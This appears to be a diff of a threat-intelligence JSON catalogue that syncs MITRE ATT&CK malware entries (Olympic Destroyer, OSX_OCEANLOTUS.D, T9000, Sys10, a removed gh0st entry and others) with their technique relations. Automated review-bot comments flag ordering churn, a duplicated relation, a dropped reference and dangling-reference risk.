The malware has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018) ", + "meta": { + "external_id": "S0365", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0365", + "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + ], + "synonyms": [ + "Olympic Destroyer" + ] + }, + "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ 
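Review bot: The Olympic Destroyer description ends with a trailing space after `(Citation: Talos Olympic Destroyer 2018)`, the same kind of upstream whitespace that appears in other new entries in this patch; the generator should strip descriptions on import so the stored text is canonical and does not churn when MITRE fixes it. The entry's `related` list starts here and continues past the end of the hunk, so whether the "worm-like" spreading mentioned in the description is reflected by lateral-movement relationships cannot be checked from this hunk. The Cardinal RAT additions above it are relation entries only.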
@@ -1318,50 +2247,92 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" } ], - "uuid": "b9799466-9dd7-4098-b2d6-f999ce50b9a8", - "value": "Gold Dragon - S0249" + "uuid": "3249e92a-870b-426d-8790-ba311c1abfb4", + "value": "Olympic Destroyer - S0365" }, { "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)", @@ -1474,27 +2445,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ @@ -1502,13 +2452,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ @@ -1517,7 +2460,7 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -1530,6 +2473,27 @@ ], "type": "uses" }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ @@ -1545,7 +2509,14 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1578,13 +2549,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ @@ -1592,13 +2556,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ @@ -1606,13 +2563,6 @@ ], "type": "uses" }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ 
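Review bot: The hunks on this line and the next (`@@ -1530,6 +2473,27 @@`, `@@ -1545,7 +2509,14 @@`, `@@ -1578,13 +2549,6 @@` through `@@ -1647,6 +2583,41 @@`) remove `dest-uuid` entries such as `c21d5a77-d422-4a69-acd7-2c53c1faa34b`, `707399d6-ab3e-4963-9315-d9d3818cd6a0` and `354a7f88-63fb-41b5-a801-ce3b377b36f1` only to re-add the same values at another position of the same `related` array, which reads as the generator emitting relations in an unstable order rather than as a content change. Sorting each `related` array by `dest-uuid` and `type` before writing would keep future syncs down to genuine additions and removals and let a reviewer spot the real edits, such as the reference removal later in this patch. The same churn pattern repeats in the later hunks of this chunk (the `66b1dcde-17a0-4c7b-95fa-b08d430c2131`, `5967cc93-57c9-404a-8ffd-097edfa7bdfc` and `4bf6ba32-4165-42c1-b911-9c36165891c8` entries and onward). A per-array uniqueness check would also be worth adding: on the new side `354a7f88-63fb-41b5-a801-ce3b377b36f1` appears both at +2509 and at +2583, and unless an entry boundary sits in the unseen context between those hunks that is a duplicated relation.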
@@ -1620,20 +2570,6 @@ ], "type": "uses" }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -1647,6 +2583,41 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "66b1dcde-17a0-4c7b-95fa-b08d430c2131", @@ -1683,7 +2654,7 @@ "type": "uses" }, { - "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -1696,6 +2667,34 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -1709,34 +2708,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "5967cc93-57c9-404a-8ffd-097edfa7bdfc", 
@@ -1794,6 +2765,20 @@ ], "type": "uses" }, + { + "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", "tags": [ @@ -1815,20 +2800,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ @@ -1837,7 +2808,7 @@ "type": "uses" }, { - "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1903,6 +2874,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "89fcd02f-62dc-40b9-a54b-9ac4b1baef05", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c6a146ae-9c63-4606-97ff-e261e76e8380", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4bf6ba32-4165-42c1-b911-9c36165891c8", 
@@ -1932,7 +2931,7 @@ "type": "uses" }, { - "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1945,26 +2944,26 @@ ], "type": "uses" }, - { - "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "40d3e230-ed32-469f-ba89-be70cc08ab39", @@ -2001,13 +3000,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ @@ -2030,7 +3022,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2044,14 +3043,14 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2065,14 +3064,14 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2106,21 +3105,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2133,6 +3118,13 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ 
@@ -2141,7 +3133,14 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2151,6 +3150,96 @@ "uuid": "82cb34ba-02b5-432b-b2d2-07f55cbf674d", "value": "Trojan.Karagany - S0094" }, + { + "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)", + "meta": { + "external_id": "S0352", + "mitre_platforms": [ + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0352", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" + ], + "synonyms": [ + "OSX_OCEANLOTUS.D" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e99ec083-abdd-48de-ad87-4dbf6f8ba2a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29", + "value": "OSX_OCEANLOTUS.D - S0352" + }, { "description": "[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)", "meta": { @@ -2182,13 +3271,6 @@ ], "type": "uses" }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ 
@@ -2197,56 +3279,7 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2260,7 +3293,63 @@ "type": "uses" }, { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2319,8 +3408,7 @@ "Windows" ], "refs": [ - "https://attack.mitre.org/software/S0060", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + "https://attack.mitre.org/software/S0060" ], "synonyms": [ "Sys10" @@ -2349,7 +3437,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
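Review bot: The `@@ -2319,8 +3408,7 @@` hunk drops `https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf` from the `refs` of the Sys10 (S0060) entry, leaving only the attack.mitre.org page as a reference, and nothing in the visible change explains the removal. If the upstream ATT&CK object no longer carries that citation the change is correct but deserves a mention in the commit message, because a primary-source report disappearing from a cluster is easy to miss amid the surrounding reordering of `related` entries; otherwise the line should be kept. The enclosing Sys10 object starts before and ends after this hunk.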
@@ -2363,14 +3451,14 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2423,83 +3511,6 @@ "uuid": "251fbae2-78f6-4de7-84f6-194c727a64ad", "value": "Lurid - S0010" }, - { - "description": "[gh0st](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by many groups. (Citation: FireEye Hacking Team)", - "meta": { - "external_id": "S0032", - "mitre_platforms": [ - "Windows", - "macOS" - ], - "refs": [ - "https://attack.mitre.org/software/S0032", - "https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html" - ], - "synonyms": [ - "gh0st" - ] - }, - "related": [ - { - "dest-uuid": "1b1ae63f-bcee-4aba-8994-6c60cee5e16f", - "tags": [ - "estimative-language:likelihood-probability=\"likely\"" - ], - "type": "similar" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - } - ], - "uuid": "88c621a7-aef9-4ae0-94e3-1fc87123eb24", - "value": "gh0st - S0032" - }, { "description": 
"[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)", "meta": { @@ -2523,13 +3534,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ @@ -2544,6 +3548,20 @@ ], "type": "uses" }, + { + "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ @@ -2558,13 +3576,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ 
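Review bot: The `@@ -2423,83 +3511,6 @@` hunk, which starts on the previous line, deletes the whole gh0st - S0032 entry with uuid `88c621a7-aef9-4ae0-94e3-1fc87123eb24`, including its `similar` relation to `1b1ae63f-bcee-4aba-8994-6c60cee5e16f`, without any check that the uuid is not referenced as a `dest-uuid` from other clusters. Unless the same uuid is re-added elsewhere in this commit (not visible here, possibly under a renamed value), every existing reference to it becomes dangling, and if this galaxy follows the convention of keeping retired ATT&CK objects with a revoked flag rather than removing them, the entry should be kept and marked rather than dropped. A pre-commit check that every `dest-uuid` resolves to an existing cluster uuid would catch this class of regression.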
